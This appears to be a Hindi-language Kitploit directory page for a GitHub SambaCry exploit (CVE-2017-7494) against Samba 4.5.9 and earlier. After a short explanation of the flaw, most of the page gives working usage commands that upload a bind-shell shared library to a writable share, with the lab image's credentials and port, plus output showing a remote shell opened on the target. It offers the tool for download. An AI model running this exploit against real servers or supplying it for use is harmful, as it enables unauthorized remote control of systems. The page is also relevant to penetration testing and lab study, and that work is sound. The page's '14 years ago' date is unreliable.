Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
exploit-CVE-2017-7494 — SambaCry एक्सप्लॉइट (CVE-2017-7494) | Kitploit
उपकरण/GitHubGitHub/00mjk/exploit-cve-2017-7494
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHub00mjk/exploit-cve-2017-7494

exploit-CVE-2017-7494

SambaCry एक्सप्लॉइट (CVE-2017-7494)

रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SambaCry RCE शोषण Samba 4.5.9 के लिए

Samba, SMB/CIFS नेटवर्किंग प्रोटोकॉल का एक मुफ्त सॉफ्टवेयर पुनः-कार्यान्वयन है। Samba विभिन्न Microsoft Windows क्लाइंट के लिए फ़ाइल और प्रिंट सेवाएं प्रदान करता है और Microsoft Windows Server डोमेन के साथ एकीकृत हो सकता है, या तो डोमेन कंट्रोलर (DC) के रूप में या डोमेन सदस्य के रूप में। संस्करण 4 के अनुसार, यह Active Directory और Microsoft Windows NT डोमेन का समर्थन करता है।

Samba 4.5.9 संस्करण और उससे पहले के संस्करण SambaCry नामक एक रिमोट कोड निष्पादन भेद्यता के लिए संवेदनशील हैं। CVE-2017-7494 रिमोट प्रमाणित उपयोगकर्ताओं को एक लिखने योग्य साझा फ़ोल्डर में एक साझा लाइब्रेरी अपलोड करने और कमजोर Samba सेवाओं को होस्ट करने वाले सर्वरों पर नियंत्रण लेने के लिए कोड निष्पादन हमले करने की अनुमति देता है।

Samba 3.x (3.5.0 के बाद) और 4.x (4.4.14 से पहले), 4.5.x (4.5.10 से पहले), और 4.6.x (4.6.4 से पहले) Windows नामित पाइप का उपयोग करते समय फ़ाइल पथ को प्रतिबंधित नहीं करता है, जो रिमोट प्रमाणित उपयोगकर्ताओं को एक लिखने योग्य साझा फ़ोल्डर में एक साझा लाइब्रेरी अपलोड करने और एक क्राफ्टेड नामित पाइप के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देता है।

शोषण

इस शोषण के लिए वातावरण सेटअप करने के लिए poetry का उपयोग करें

root@kitploit:~
pip3 install -r requirements.txt

उसके बाद आप इसे निम्नानुसार चला सकते हैं:

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s <share> -r <location>/libbindshell-samba.so \
             -u <user> -p <password> -P 6699

उदाहरण के लिए, यदि आप vulnerables/cve-2017-7494 से कमजोर इमेज का उपयोग करते हैं और इसके विरुद्ध इस शोषण को चलाना चाहते हैं:

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s data -r /data/libbindshell-samba.so \
             -u sambacry -p nosambanocry -P 6699

और आपको निम्न आउटपुट मिलेगा

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s data -r /data/libbindshell-samba.so \
             -u sambacry -p nosambanocry -P 6699
[*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699
[+] Veryfying your shell...
Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux
>>

श्रेय

इस प्रोजेक्ट का पेलोड, कोड के साथ, opsxcq/exploit-CVE-2017-7494 से काफी प्रेरित था।

टूल डाउनलोड करें